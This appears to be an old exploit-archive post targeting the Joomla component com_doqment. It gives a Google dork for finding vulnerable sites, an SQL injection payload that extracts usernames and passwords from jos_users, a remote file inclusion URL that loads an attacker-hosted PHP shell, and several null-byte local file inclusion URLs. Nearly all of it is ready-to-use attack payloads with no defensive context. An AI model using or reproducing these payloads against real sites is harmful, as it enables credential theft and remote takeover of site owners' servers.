Author : KedAns-Dz
Go0gle Dork : " inurl:com_doqment "
#==============>>>>> Exploit (1) SQL Injection %100
> SQL : -11/**/union/**/select/**/1,2,concat(username,0x3a,password),4,5,6,7,8/**/from/**/jos_users--
> ExplO!t :
http://[Target]/[Path]/index.php?option=com_doqment&cid= ! [ SQL Here ] !
#==============>>>>> Exploit (2) Remote File Inclusion %50 <<<<<=================#
> DzShell :
http://[Your-Space]/Sh311.php
> ComBug : admin.ponygallery.html.php?mosConfig_absolute_path =
> ExplO!t :
http://[Target]/[Path]/index.php?option=com_doqment&cid=[+ ComBug +]=[ ! DzShell ! ]
""" Note Fo4r This exploit RFI : 50% Because Not All Sites has Component 'ponygallery' in 'com_doqment' """
#==============>>>>> Exploit (3) Local File Inclusion %50 <<<<<=================#
> ExplO!t :
http://[Target]/[Path]/components/com_doqment/documents?file=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/documents/file?id=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/documents/?=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/files/?=[LFI]%00
>
http://[Target]/[Path]/components/com_doqment/file/?=[LFI]%00